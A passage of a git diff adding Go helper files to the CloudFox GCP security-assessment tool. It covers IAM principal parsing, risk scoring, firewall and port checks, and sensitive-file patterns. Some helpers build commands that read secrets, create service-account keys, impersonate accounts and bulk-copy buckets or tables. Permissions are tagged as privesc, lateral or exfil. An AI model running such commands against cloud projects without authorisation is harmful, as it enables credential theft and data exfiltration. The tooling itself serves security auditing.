+ return fmt.Sprintf("gsutil -m cp -r gs://%s/* %s", bucketName, localPath) + } + return fmt.Sprintf("gsutil cp gs://%s/%s %s", bucketName, objectPath, localPath) +} + +// GcloudAccessSecretVersion returns a gcloud command to access a secret +func GcloudAccessSecretVersion(projectID, secretName, version string) string { + if version == "" { + version = "latest" + } + return fmt.Sprintf("gcloud secrets versions access %s --secret=%s --project=%s", + version, secretName, projectID) +} + +// GcloudListSAKeys returns a gcloud command to list service account keys +func GcloudListSAKeys(projectID, saEmail string) string { + return fmt.Sprintf("gcloud iam service-accounts keys list --iam-account=%s --project=%s", + saEmail, projectID) +} + +// GcloudCreateSAKey returns a 
gcloud command to create a service account key +func GcloudCreateSAKey(projectID, saEmail, outputFile string) string { + return fmt.Sprintf("gcloud iam service-accounts keys create %s --iam-account=%s --project=%s", + outputFile, saEmail, projectID) +} + +// GcloudImpersonateSA returns a gcloud command to impersonate a service account +func GcloudImpersonateSA(saEmail, command string) string { + return fmt.Sprintf("gcloud %s --impersonate-service-account=%s", command, saEmail) +} + +// GcloudGetClusterCredentials returns a gcloud command to get GKE cluster credentials +func GcloudGetClusterCredentials(projectID, location, clusterName string) string { + locFlag := "--region" + if !strings.Contains(location, "-") || len(strings.Split(location, "-")) == 3 { + locFlag = "--zone" + } + return fmt.Sprintf("gcloud container clusters get-credentials %s %s=%s --project=%s", + clusterName, locFlag, location, projectID) +} + +// BqQuery returns a bq command to run a query +func BqQuery(projectID, query string) string { + return fmt.Sprintf("bq query --project_id=%s --use_legacy_sql=false '%s'", + projectID, query) +} + +// BqExtract returns a bq command to extract a table to GCS +func BqExtract(projectID, dataset, table, gcsPath string) string { + return fmt.Sprintf("bq extract --project_id=%s %s.%s %s", + projectID, dataset, table, gcsPath) +} diff --git a/gcp/shared/network.go b/gcp/shared/network.go new file mode 100644 index 00000000..e9e7979b --- /dev/null +++ b/gcp/shared/network.go @@ -0,0 +1,346 @@ +package shared + +import ( + "fmt" + "strconv" + "strings" +) + +// Public CIDR constants +const ( + CIDRAllIPv4 = "0.0.0.0/0" + CIDRAllIPv6 = "::/0" + // Broad ranges that are effectively public + CIDRHalfIPv4Low = "0.0.0.0/1" + CIDRHalfIPv4High = "128.0.0.0/1" +) + +// IsPublicCIDR checks if a CIDR range represents public/internet access. +// Returns true for 0.0.0.0/0, ::/0, and other effectively-public ranges. 
+func IsPublicCIDR(cidr string) bool { + cidr = strings.TrimSpace(cidr) + switch cidr { + case CIDRAllIPv4, CIDRAllIPv6, CIDRHalfIPv4Low, CIDRHalfIPv4High: + return true + } + return false +} + +// HasPublicCIDR checks if any CIDR in the slice represents public access. +func HasPublicCIDR(cidrs []string) bool { + for _, cidr := range cidrs { + if IsPublicCIDR(cidr) { + return true + } + } + return false +} + +// IsPrivateIP checks if an IP address is in a private range. +// Private ranges: 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16 +func IsPrivateIP(ip string) bool { + // Handle CIDR notation + if idx := strings.Index(ip, "/"); idx != -1 { + ip = ip[:idx] + } + + parts := strings.Split(ip, ".") + if len(parts) != 4 { + return false + } + + first, err := strconv.Atoi(parts[0]) + if err != nil { + return false + } + + // 10.0.0.0/8 + if first == 10 { + return true + } + + // 172.16.0.0/12 + if first == 172 { + second, err := strconv.Atoi(parts[1]) + if err != nil { + return false + } + if second >= 16 && second <= 31 { + return true + } + } + + // 192.168.0.0/16 + if first == 192 { + second, err := strconv.Atoi(parts[1]) + if err != nil { + return false + } + if second == 168 { + return true + } + } + + return false +} + +// SensitivePort represents a port with security implications +type SensitivePort struct { + Port int + Protocol string + Service string + Risk string + Description string +} + +// SensitivePorts maps port numbers to their security information +var SensitivePorts = map[int]SensitivePort{ + // Remote Access + 22: {22, "TCP", "SSH", RiskHigh, "Remote shell access"}, + 23: {23, "TCP", "Telnet", RiskCritical, "Unencrypted remote access"}, + 3389: {3389, "TCP", "RDP", RiskHigh, "Remote Desktop Protocol"}, + 5900: {5900, "TCP", "VNC", RiskHigh, "Virtual Network Computing"}, + 5985: {5985, "TCP", "WinRM-HTTP", RiskHigh, "Windows Remote Management (HTTP)"}, + 5986: {5986, "TCP", "WinRM-HTTPS", RiskMedium, "Windows Remote Management (HTTPS)"}, + + // 
Databases + 3306: {3306, "TCP", "MySQL", RiskHigh, "MySQL database"}, + 5432: {5432, "TCP", "PostgreSQL", RiskHigh, "PostgreSQL database"}, + 1433: {1433, "TCP", "MSSQL", RiskHigh, "Microsoft SQL Server"}, + 1521: {1521, "TCP", "Oracle", RiskHigh, "Oracle database"}, + 27017: {27017, "TCP", "MongoDB", RiskHigh, "MongoDB database"}, + 6379: {6379, "TCP", "Redis", RiskHigh, "Redis (often no auth)"}, + 9042: {9042, "TCP", "Cassandra", RiskMedium, "Cassandra database"}, + 5984: {5984, "TCP", "CouchDB", RiskMedium, "CouchDB database"}, + 9200: {9200, "TCP", "Elasticsearch", RiskHigh, "Elasticsearch (often no auth)"}, + + // Web/API + 80: {80, "TCP", "HTTP", RiskMedium, "Unencrypted web traffic"}, + 443: {443, "TCP", "HTTPS", RiskLow, "Encrypted web traffic"}, + 8080: {8080, "TCP", "HTTP-Alt", RiskMedium, "Alternative HTTP"}, + 8443: {8443, "TCP", "HTTPS-Alt", RiskLow, "Alternative HTTPS"}, + + // Infrastructure + 53: {53, "TCP/UDP", "DNS", RiskMedium, "DNS queries/transfers"}, + 25: {25, "TCP", "SMTP", RiskMedium, "Email relay"}, + 110: {110, "TCP", "POP3", RiskMedium, "Email retrieval (unencrypted)"}, + 143: {143, "TCP", "IMAP", RiskMedium, "Email retrieval (unencrypted)"}, + 389: {389, "TCP", "LDAP", RiskHigh, "Directory services (unencrypted)"}, + 636: {636, "TCP", "LDAPS", RiskMedium, "Directory services (encrypted)"}, + 445: {445, "TCP", "SMB", RiskCritical, "Windows file sharing"}, + 137: {137, "UDP", "NetBIOS-NS", RiskHigh, "NetBIOS Name Service"}, + 138: {138, "UDP", "NetBIOS-DG", RiskHigh, "NetBIOS Datagram"}, + 139: {139, "TCP", "NetBIOS-SS", RiskHigh, "NetBIOS Session"}, + 111: {111, "TCP/UDP", "RPC", RiskHigh, "Remote Procedure Call"}, + 2049: {2049, "TCP/UDP", "NFS", RiskHigh, "Network File System"}, + + // Container/Orchestration + 2375: {2375, "TCP", "Docker-Unencrypted", RiskCritical, "Docker API (unencrypted)"}, + 2376: {2376, "TCP", "Docker-TLS", RiskMedium, "Docker API (TLS)"}, + 6443: {6443, "TCP", "Kubernetes-API", RiskHigh, "Kubernetes API 
server"}, + 10250: {10250, "TCP", "Kubelet", RiskHigh, "Kubelet API"}, + 10255: {10255, "TCP", "Kubelet-RO", RiskMedium, "Kubelet read-only API"}, + 2379: {2379, "TCP", "etcd", RiskCritical, "etcd (K8s secrets)"}, + + // Monitoring + 9090: {9090, "TCP", "Prometheus", RiskMedium, "Prometheus metrics"}, + 3000: {3000, "TCP", "Grafana", RiskMedium, "Grafana dashboard"}, + 8500: {8500, "TCP", "Consul", RiskMedium, "HashiCorp Consul"}, + + // Message Queues + 5672: {5672, "TCP", "AMQP", RiskMedium, "RabbitMQ"}, + 15672: {15672, "TCP", "RabbitMQ-Mgmt", RiskMedium, "RabbitMQ management"}, + 9092: {9092, "TCP", "Kafka", RiskMedium, "Apache Kafka"}, + + // Other + 11211: {11211, "TCP", "Memcached", RiskHigh, "Memcached (often no auth)"}, + 6666: {6666, "TCP", "IRC", RiskMedium, "IRC (potential backdoor)"}, + 4444: {4444, "TCP", "Metasploit", RiskCritical, "Common Metasploit port"}, +} + +// IsSensitivePort checks if a port is considered security-sensitive +func IsSensitivePort(port int) bool { + _, exists := SensitivePorts[port] + return exists +} + +// GetPortInfo returns information about a port if it's sensitive +func GetPortInfo(port int) (SensitivePort, bool) { + info, exists := SensitivePorts[port] + return info, exists +} + +// GetPortRisk returns the risk level for a port (or RiskLow if not sensitive) +func GetPortRisk(port int) string { + if info, exists := SensitivePorts[port]; exists { + return info.Risk + } + return RiskLow +} + +// AssessFirewallRuleRisk assesses the risk of a firewall rule based on its configuration +func AssessFirewallRuleRisk(isIngress bool, isPublic bool, allowsAllPorts bool, ports []int) string { + // Egress rules are generally lower risk + if !isIngress { + if isPublic && allowsAllPorts { + return RiskMedium + } + return RiskLow + } + + // Ingress rules from public internet + if isPublic { + if allowsAllPorts { + return RiskCritical // All ports from internet = critical + } + + // Check for sensitive ports + for _, port := range ports { + 
if info, exists := SensitivePorts[port]; exists { + if info.Risk == RiskCritical { + return RiskCritical + } + } + } + + // Any public ingress with specific ports is at least high risk + return RiskHigh + } + + // Internal ingress rules + if allowsAllPorts { + return RiskMedium + } + + return RiskLow +} + +// FirewallRuleIssues identifies security issues with a firewall rule +func FirewallRuleIssues(isIngress bool, isPublic bool, allowsAllPorts bool, ports []int, hasTargetTags bool, loggingEnabled bool) []string { + var issues []string + + if isIngress { + if isPublic { + issues = append(issues, "Allows traffic from 0.0.0.0/0 (internet)") + } + + if allowsAllPorts { + issues = append(issues, "Allows ALL ports") + } + + // Check for sensitive ports exposed to internet + if isPublic { + for _, port := range ports { + if info, exists := SensitivePorts[port]; exists { + issues = append(issues, fmt.Sprintf("Exposes %s (%d) to internet", info.Service, port)) + } + } + } + + if !hasTargetTags { + issues = append(issues, "No target tags - applies to ALL instances") + } + } + + if !loggingEnabled { + issues = append(issues, "Firewall logging disabled") + } + + return issues +} + +// FormatPortRange formats a port range for display +func FormatPortRange(startPort, endPort int) string { + if startPort == endPort { + return fmt.Sprintf("%d", startPort) + } + return fmt.Sprintf("%d-%d", startPort, endPort) +} + +// ParsePortRange parses a port range string like "80" or "8000-9000" +func ParsePortRange(portStr string) (start, end int, err error) { + portStr = strings.TrimSpace(portStr) + + if strings.Contains(portStr, "-") { + parts := strings.Split(portStr, "-") + if len(parts) != 2 { + return 0, 0, fmt.Errorf("invalid port range: %s", portStr) + } + start, err = strconv.Atoi(strings.TrimSpace(parts[0])) + if err != nil { + return 0, 0, err + } + end, err = strconv.Atoi(strings.TrimSpace(parts[1])) + if err != nil { + return 0, 0, err + } + return start, end, nil + } + + port, 
err := strconv.Atoi(portStr) + if err != nil { + return 0, 0, err + } + return port, port, nil +} + +// ExpandPortRanges expands port range strings to individual ports (up to a limit) +func ExpandPortRanges(portRanges []string, maxPorts int) []int { + var ports []int + seen := make(map[int]bool) + + for _, rangeStr := range portRanges { + start, end, err := ParsePortRange(rangeStr) + if err != nil { + continue + } + + for p := start; p <= end && len(ports) < maxPorts; p++ { + if !seen[p] { + seen[p] = true + ports = append(ports, p) + } + } + } + + return ports +} + +// Protocol constants +const ( + ProtocolTCP = "tcp" + ProtocolUDP = "udp" + ProtocolICMP = "icmp" + ProtocolAll = "all" +) + +// IsAllProtocols checks if the protocol specification allows all protocols +func IsAllProtocols(protocol string) bool { + protocol = strings.ToLower(strings.TrimSpace(protocol)) + return protocol == "all" || protocol == "*" || protocol == "" +} + +// NetworkEndpointType categorizes network endpoints +type NetworkEndpointType string + +const ( + EndpointTypePublicIP NetworkEndpointType = "Public IP" + EndpointTypePrivateIP NetworkEndpointType = "Private IP" + EndpointTypeLoadBalancer NetworkEndpointType = "Load Balancer" + EndpointTypeNAT NetworkEndpointType = "NAT Gateway" + EndpointTypeVPNTunnel NetworkEndpointType = "VPN Tunnel" + EndpointTypeInterconnect NetworkEndpointType = "Interconnect" + EndpointTypePrivateService NetworkEndpointType = "Private Service Connect" + EndpointTypeInternal NetworkEndpointType = "Internal" +) + +// CategorizeEndpoint determines the type of a network endpoint +func CategorizeEndpoint(ipOrURL string, isExternal bool) NetworkEndpointType { + if isExternal { + return EndpointTypePublicIP + } + if IsPrivateIP(ipOrURL) { + return EndpointTypePrivateIP + } + return EndpointTypeInternal +} diff --git a/gcp/shared/principals.go b/gcp/shared/principals.go new file mode 100644 index 00000000..7a7dff34 --- /dev/null +++ b/gcp/shared/principals.go @@ -0,0 
+1,170 @@ +// Package shared provides common utilities for GCP CloudFox modules. +// This package contains helper functions for IAM principals, formatting, +// risk assessment, and other cross-cutting concerns. +package shared + +import "strings" + +// PrincipalType constants for IAM member types +const ( + PrincipalTypePublic = "PUBLIC" + PrincipalTypeAllAuthenticated = "ALL_AUTHENTICATED" + PrincipalTypeUser = "User" + PrincipalTypeServiceAccount = "ServiceAccount" + PrincipalTypeGroup = "Group" + PrincipalTypeDomain = "Domain" + PrincipalTypeProjectOwner = "ProjectOwner" + PrincipalTypeProjectEditor = "ProjectEditor" + PrincipalTypeProjectViewer = "ProjectViewer" + PrincipalTypeDeleted = "Deleted" + PrincipalTypeUnknown = "Unknown" +) + +// Lowercase principal type constants (for consistency with some existing code) +const ( + PrincipalTypeLowerUser = "user" + PrincipalTypeLowerServiceAccount = "serviceAccount" + PrincipalTypeLowerGroup = "group" + PrincipalTypeLowerUnknown = "unknown" +) + +// GetPrincipalType extracts the type of an IAM principal from its full member string. +// This handles the standard GCP IAM member format (e.g., "user:email@example.com"). +// Returns a capitalized type suitable for table display. 
+// +// Examples: +// - "allUsers" -> "PUBLIC" +// - "allAuthenticatedUsers" -> "ALL_AUTHENTICATED" +// - "user:admin@example.com" -> "User" +// - "serviceAccount:sa@project.iam.gserviceaccount.com" -> "ServiceAccount" +// - "group:devs@example.com" -> "Group" +// - "domain:example.com" -> "Domain" +func GetPrincipalType(member string) string { + switch { + case member == "allUsers": + return PrincipalTypePublic + case member == "allAuthenticatedUsers": + return PrincipalTypeAllAuthenticated + case strings.HasPrefix(member, "user:"): + return PrincipalTypeUser + case strings.HasPrefix(member, "serviceAccount:"): + return PrincipalTypeServiceAccount + case strings.HasPrefix(member, "group:"): + return PrincipalTypeGroup + case strings.HasPrefix(member, "domain:"): + return PrincipalTypeDomain + case strings.HasPrefix(member, "projectOwner:"): + return PrincipalTypeProjectOwner + case strings.HasPrefix(member, "projectEditor:"): + return PrincipalTypeProjectEditor + case strings.HasPrefix(member, "projectViewer:"): + return PrincipalTypeProjectViewer + case strings.HasPrefix(member, "deleted:"): + return PrincipalTypeDeleted + default: + return PrincipalTypeUnknown + } +} + +// GetPrincipalTypeLower returns the principal type in lowercase format. +// This is useful when consistent lowercase output is needed. +// +// Examples: +// - "user:admin@example.com" -> "user" +// - "serviceAccount:sa@project.iam.gserviceaccount.com" -> "serviceAccount" +// - "group:devs@example.com" -> "group" +func GetPrincipalTypeLower(principal string) string { + if strings.HasPrefix(principal, "user:") { + return PrincipalTypeLowerUser + } else if strings.HasPrefix(principal, "serviceAccount:") { + return PrincipalTypeLowerServiceAccount + } else if strings.HasPrefix(principal, "group:") { + return PrincipalTypeLowerGroup + } + return PrincipalTypeLowerUnknown +} + +// ExtractPrincipalEmail extracts the email/identifier from an IAM member string. 
// The returned value is everything after the first ":"; if the member has
// no ":" separator, the input is returned unchanged.
//
// Examples:
//   - "user:admin@example.com" -> "admin@example.com"
//   - "serviceAccount:sa@project.iam.gserviceaccount.com" -> "sa@project.iam.gserviceaccount.com"
//   - "allUsers" -> "allUsers"
func ExtractPrincipalEmail(member string) string {
	if _, after, found := strings.Cut(member, ":"); found {
		return after
	}
	return member
}

// IsPublicPrincipal checks if a principal represents public access.
// Returns true for "allUsers" or "allAuthenticatedUsers".
func IsPublicPrincipal(member string) bool {
	switch member {
	case "allUsers", "allAuthenticatedUsers":
		return true
	}
	return false
}

// IsServiceAccount checks if a principal is a service account.
func IsServiceAccount(member string) bool {
	return strings.HasPrefix(member, "serviceAccount:")
}

// IsUser checks if a principal is a user.
func IsUser(member string) bool {
	return strings.HasPrefix(member, "user:")
}

// IsGroup checks if a principal is a group.
func IsGroup(member string) bool {
	return strings.HasPrefix(member, "group:")
}

// IsDeleted checks if a principal has been deleted.
func IsDeleted(member string) bool {
	return strings.HasPrefix(member, "deleted:")
}

// ExtractServiceAccountProject extracts the project ID from a service account email.
// Service account format: name@project-id.iam.gserviceaccount.com
// Returns empty string if not a valid service account format.
func ExtractServiceAccountProject(saEmail string) string {
	// Accept both bare emails and "serviceAccount:"-prefixed members.
	email := ExtractPrincipalEmail(saEmail)

	const suffix = ".iam.gserviceaccount.com"
	if !strings.HasSuffix(email, suffix) {
		return ""
	}

	// The project ID sits between the first "@" and the domain suffix.
	_, domain, found := strings.Cut(email, "@")
	if !found {
		return ""
	}
	return strings.TrimSuffix(domain, suffix)
}

// IsDefaultServiceAccount checks if a service account is a default compute or app engine SA.
// Default SAs follow patterns like:
//   - PROJECT_NUMBER-compute@developer.gserviceaccount.com
//   - PROJECT_ID@appspot.gserviceaccount.com
func IsDefaultServiceAccount(saEmail string) bool {
	email := ExtractPrincipalEmail(saEmail)
	return strings.HasSuffix(email, "@developer.gserviceaccount.com") ||
		strings.HasSuffix(email, "@appspot.gserviceaccount.com")
}

// IsGoogleManagedServiceAccount checks if a service account is managed by Google.
+// These typically have formats like: +// - service-PROJECT_NUMBER@*.iam.gserviceaccount.com +// - PROJECT_NUMBER@cloudservices.gserviceaccount.com +func IsGoogleManagedServiceAccount(saEmail string) bool { + email := ExtractPrincipalEmail(saEmail) + return strings.HasPrefix(email, "service-") || + strings.Contains(email, "@cloudservices.gserviceaccount.com") || + strings.Contains(email, "@cloud-ml.google.com.iam.gserviceaccount.com") || + strings.Contains(email, "@gcp-sa-") +} diff --git a/gcp/shared/risk.go b/gcp/shared/risk.go new file mode 100644 index 00000000..1d6b8663 --- /dev/null +++ b/gcp/shared/risk.go @@ -0,0 +1,317 @@ +package shared + +import ( + "fmt" + "strings" +) + +// RiskLevel constants for standardized risk assessment across modules +const ( + RiskCritical = "CRITICAL" // Immediate exploitation possible, highest priority + RiskHigh = "HIGH" // Significant security issue, high priority + RiskMedium = "MEDIUM" // Notable risk, moderate priority + RiskLow = "LOW" // Minor issue or informational + RiskInfo = "INFO" // Informational, no direct risk + RiskNone = "NONE" // No risk identified +) + +// RiskScore represents a risk assessment with reasons +type RiskScore struct { + Level string // RiskCritical, RiskHigh, RiskMedium, RiskLow + Score int // Numeric score for comparison (0-100) + Reasons []string // Explanations for the risk level +} + +// NewRiskScore creates a new RiskScore with default low risk +func NewRiskScore() *RiskScore { + return &RiskScore{ + Level: RiskLow, + Score: 0, + Reasons: []string{}, + } +} + +// AddReason adds a reason and recalculates the risk level +func (r *RiskScore) AddReason(reason string, points int) { + r.Reasons = append(r.Reasons, reason) + r.Score += points + r.updateLevel() +} + +// SetCritical sets the risk to critical level with a reason +func (r *RiskScore) SetCritical(reason string) { + r.Level = RiskCritical + r.Score = 100 + r.Reasons = append(r.Reasons, reason) +} + +// updateLevel updates the risk 
level based on score +func (r *RiskScore) updateLevel() { + switch { + case r.Score >= 80: + r.Level = RiskCritical + case r.Score >= 50: + r.Level = RiskHigh + case r.Score >= 25: + r.Level = RiskMedium + default: + r.Level = RiskLow + } +} + +// ReasonsString returns all reasons as a single string +func (r *RiskScore) ReasonsString() string { + if len(r.Reasons) == 0 { + return "-" + } + return strings.Join(r.Reasons, "; ") +} + +// IsHighRisk returns true if risk level is HIGH or CRITICAL +func (r *RiskScore) IsHighRisk() bool { + return r.Level == RiskCritical || r.Level == RiskHigh +} + +// RiskLevelOrder returns the numeric order of a risk level (for sorting) +// Higher number = higher risk +func RiskLevelOrder(level string) int { + switch level { + case RiskCritical: + return 4 + case RiskHigh: + return 3 + case RiskMedium: + return 2 + case RiskLow: + return 1 + case RiskInfo, RiskNone: + return 0 + default: + return -1 + } +} + +// CompareRiskLevels compares two risk levels. +// Returns: -1 if a < b, 0 if a == b, 1 if a > b +func CompareRiskLevels(a, b string) int { + orderA := RiskLevelOrder(a) + orderB := RiskLevelOrder(b) + if orderA < orderB { + return -1 + } + if orderA > orderB { + return 1 + } + return 0 +} + +// MaxRiskLevel returns the higher of two risk levels +func MaxRiskLevel(a, b string) string { + if CompareRiskLevels(a, b) >= 0 { + return a + } + return b +} + +// RiskLevelFromScore converts a numeric score to a risk level +func RiskLevelFromScore(score int) string { + switch { + case score >= 80: + return RiskCritical + case score >= 50: + return RiskHigh + case score >= 25: + return RiskMedium + case score > 0: + return RiskLow + default: + return RiskNone + } +} + +// RiskCounts tracks counts of findings by risk level +type RiskCounts struct { + Critical int + High int + Medium int + Low int + Info int + Total int +} + +// Add increments the appropriate counter based on risk level +func (rc *RiskCounts) Add(level string) { + rc.Total++ + 
switch level { + case RiskCritical: + rc.Critical++ + case RiskHigh: + rc.High++ + case RiskMedium: + rc.Medium++ + case RiskLow: + rc.Low++ + case RiskInfo, RiskNone: + rc.Info++ + } +} + +// Summary returns a formatted summary string +func (rc *RiskCounts) Summary() string { + parts := []string{} + if rc.Critical > 0 { + parts = append(parts, fmt.Sprintf("%d CRITICAL", rc.Critical)) + } + if rc.High > 0 { + parts = append(parts, fmt.Sprintf("%d HIGH", rc.High)) + } + if rc.Medium > 0 { + parts = append(parts, fmt.Sprintf("%d MEDIUM", rc.Medium)) + } + if rc.Low > 0 { + parts = append(parts, fmt.Sprintf("%d LOW", rc.Low)) + } + if len(parts) == 0 { + return "No risks found" + } + return strings.Join(parts, ", ") +} + +// HasHighRisk returns true if there are any CRITICAL or HIGH findings +func (rc *RiskCounts) HasHighRisk() bool { + return rc.Critical > 0 || rc.High > 0 +} + +// Common risk assessment functions for GCP resources + +// AssessPublicAccessRisk returns risk level for public access configuration +func AssessPublicAccessRisk(isPublic bool, hasAllUsers bool, hasAllAuthenticatedUsers bool) string { + if hasAllUsers { + return RiskCritical // Publicly accessible to everyone + } + if hasAllAuthenticatedUsers { + return RiskHigh // Accessible to any Google account + } + if isPublic { + return RiskMedium // Some form of public access + } + return RiskNone +} + +// AssessEncryptionRisk returns risk level for encryption configuration +func AssessEncryptionRisk(encryptionEnabled bool, usesCMEK bool) string { + if !encryptionEnabled { + return RiskHigh // No encryption + } + if !usesCMEK { + return RiskLow // Google-managed keys (default) + } + return RiskNone // Customer-managed keys +} + +// AssessLoggingRisk returns risk level for logging configuration +func AssessLoggingRisk(loggingEnabled bool) string { + if !loggingEnabled { + return RiskMedium // No audit trail + } + return RiskNone +} + +// DangerousPermissionCategories defines categories of dangerous 
permissions +var DangerousPermissionCategories = map[string]string{ + // Privilege Escalation + "iam.serviceAccountKeys.create": "privesc", + "iam.serviceAccounts.actAs": "privesc", + "iam.serviceAccounts.getAccessToken": "privesc", + "iam.serviceAccounts.implicitDelegation": "privesc", + "iam.serviceAccounts.signBlob": "privesc", + "iam.serviceAccounts.signJwt": "privesc", + "deploymentmanager.deployments.create": "privesc", + "cloudfunctions.functions.create": "privesc", + "cloudfunctions.functions.update": "privesc", + "run.services.create": "privesc", + "composer.environments.create": "privesc", + "dataproc.clusters.create": "privesc", + "cloudbuild.builds.create": "privesc", + "resourcemanager.projects.setIamPolicy": "privesc", + "resourcemanager.folders.setIamPolicy": "privesc", + "resourcemanager.organizations.setIamPolicy": "privesc", + + // Lateral Movement + "compute.instances.setMetadata": "lateral", + "compute.projects.setCommonInstanceMetadata": "lateral", + "compute.instances.setServiceAccount": "lateral", + "container.clusters.getCredentials": "lateral", + + // Data Exfiltration + "storage.objects.get": "exfil", + "storage.objects.list": "exfil", + "bigquery.tables.getData": "exfil", + "bigquery.jobs.create": "exfil", + "secretmanager.versions.access": "exfil", + "cloudkms.cryptoKeyVersions.useToDecrypt": "exfil", +} + +// IsDangerousPermission checks if a permission is considered dangerous +func IsDangerousPermission(permission string) bool { + _, exists := DangerousPermissionCategories[permission] + return exists +} + +// GetPermissionCategory returns the risk category for a permission +func GetPermissionCategory(permission string) string { + if cat, exists := DangerousPermissionCategories[permission]; exists { + return cat + } + return "" +} + +// AssessPermissionRisk returns the risk level for a specific permission +func AssessPermissionRisk(permission string) string { + category := GetPermissionCategory(permission) + switch category { + case 
"privesc": + return RiskCritical + case "lateral": + return RiskHigh + case "exfil": + return RiskHigh + default: + return RiskLow + } +} + +// HighPrivilegeRoles lists roles that grant significant permissions +var HighPrivilegeRoles = map[string]string{ + "roles/owner": RiskCritical, + "roles/editor": RiskCritical, + "roles/iam.securityAdmin": RiskCritical, + "roles/iam.serviceAccountAdmin": RiskCritical, + "roles/iam.serviceAccountKeyAdmin": RiskCritical, + "roles/iam.serviceAccountTokenCreator": RiskCritical, + "roles/iam.serviceAccountUser": RiskHigh, + "roles/iam.workloadIdentityUser": RiskHigh, + "roles/storage.admin": RiskHigh, + "roles/bigquery.admin": RiskHigh, + "roles/secretmanager.admin": RiskHigh, + "roles/cloudkms.admin": RiskHigh, + "roles/compute.admin": RiskHigh, + "roles/container.admin": RiskHigh, + "roles/cloudfunctions.admin": RiskHigh, + "roles/run.admin": RiskHigh, + "roles/cloudsql.admin": RiskHigh, + "roles/dataproc.admin": RiskHigh, + "roles/composer.admin": RiskHigh, +} + +// AssessRoleRisk returns the risk level for a given role +func AssessRoleRisk(role string) string { + if level, exists := HighPrivilegeRoles[role]; exists { + return level + } + // Check for admin patterns + if strings.HasSuffix(role, ".admin") || strings.Contains(role, "Admin") { + return RiskMedium + } + return RiskLow +} diff --git a/gcp/shared/sensitive.go b/gcp/shared/sensitive.go new file mode 100644 index 00000000..800f31d3 --- /dev/null +++ b/gcp/shared/sensitive.go @@ -0,0 +1,368 @@ +package shared + +import ( + "regexp" + "strings" +) + +// SensitivePattern defines a pattern for matching file/object names or resource names. +type SensitivePattern struct { + Pattern string + Category string + RiskLevel string + Description string +} + +// ContentPattern defines a regex-based pattern for matching inside text content. 
+type ContentPattern struct { + Regex *regexp.Regexp + Category string + RiskLevel string + Description string +} + +// SensitiveMatch represents a file/resource name match result. +type SensitiveMatch struct { + Pattern string + Category string + RiskLevel string + Description string + MatchedText string +} + +// ContentMatch represents a content regex match result. +type ContentMatch struct { + Pattern string + Category string + RiskLevel string + Description string + MatchedText string + Snippet string // surrounding context +} + +// GetFilePatterns returns patterns for detecting sensitive files in bucket/object names. +// These are the same patterns previously defined in bucketEnumService. +func GetFilePatterns() []SensitivePattern { + return []SensitivePattern{ + // Credentials - CRITICAL + {Pattern: ".json", Category: "Credential", RiskLevel: "CRITICAL", Description: "Service account key file"}, + {Pattern: "credentials.json", Category: "Credential", RiskLevel: "CRITICAL", Description: "GCP credentials file"}, + {Pattern: "service-account", Category: "Credential", RiskLevel: "CRITICAL", Description: "Service account key"}, + {Pattern: "keyfile", Category: "Credential", RiskLevel: "CRITICAL", Description: "Key file"}, + {Pattern: ".pem", Category: "Credential", RiskLevel: "CRITICAL", Description: "PEM private key"}, + {Pattern: ".key", Category: "Credential", RiskLevel: "CRITICAL", Description: "Private key file"}, + {Pattern: ".p12", Category: "Credential", RiskLevel: "CRITICAL", Description: "PKCS12 key file"}, + {Pattern: ".pfx", Category: "Credential", RiskLevel: "CRITICAL", Description: "PFX certificate file"}, + {Pattern: "id_rsa", Category: "Credential", RiskLevel: "CRITICAL", Description: "SSH private key"}, + {Pattern: "id_ed25519", Category: "Credential", RiskLevel: "CRITICAL", Description: "SSH private key (ed25519)"}, + {Pattern: "id_ecdsa", Category: "Credential", RiskLevel: "CRITICAL", Description: "SSH private key (ECDSA)"}, + + // Secrets - 
CRITICAL/HIGH + {Pattern: ".env", Category: "Secret", RiskLevel: "CRITICAL", Description: "Environment variables (may contain secrets)"}, + {Pattern: "secrets", Category: "Secret", RiskLevel: "HIGH", Description: "Secrets file or directory"}, + {Pattern: "password", Category: "Secret", RiskLevel: "HIGH", Description: "Password file"}, + {Pattern: "api_key", Category: "Secret", RiskLevel: "HIGH", Description: "API key file"}, + {Pattern: "apikey", Category: "Secret", RiskLevel: "HIGH", Description: "API key file"}, + {Pattern: "token", Category: "Secret", RiskLevel: "HIGH", Description: "Token file"}, + {Pattern: "auth", Category: "Secret", RiskLevel: "HIGH", Description: "Authentication file"}, + {Pattern: ".htpasswd", Category: "Secret", RiskLevel: "HIGH", Description: "HTTP password file"}, + {Pattern: ".netrc", Category: "Secret", RiskLevel: "HIGH", Description: "FTP/other credentials"}, + + // Config files - HIGH/MEDIUM + {Pattern: "config", Category: "Config", RiskLevel: "MEDIUM", Description: "Configuration file"}, + {Pattern: ".yaml", Category: "Config", RiskLevel: "MEDIUM", Description: "YAML config (may contain secrets)"}, + {Pattern: ".yml", Category: "Config", RiskLevel: "MEDIUM", Description: "YAML config (may contain secrets)"}, + {Pattern: "application.properties", Category: "Config", RiskLevel: "HIGH", Description: "Java app config"}, + {Pattern: "web.config", Category: "Config", RiskLevel: "HIGH", Description: ".NET config"}, + {Pattern: "appsettings.json", Category: "Config", RiskLevel: "HIGH", Description: ".NET app settings"}, + {Pattern: "settings.py", Category: "Config", RiskLevel: "HIGH", Description: "Django settings"}, + {Pattern: "database.yml", Category: "Config", RiskLevel: "HIGH", Description: "Rails database config"}, + {Pattern: "wp-config.php", Category: "Config", RiskLevel: "HIGH", Description: "WordPress config"}, + {Pattern: ".npmrc", Category: "Config", RiskLevel: "HIGH", Description: "NPM config (may contain tokens)"}, + 
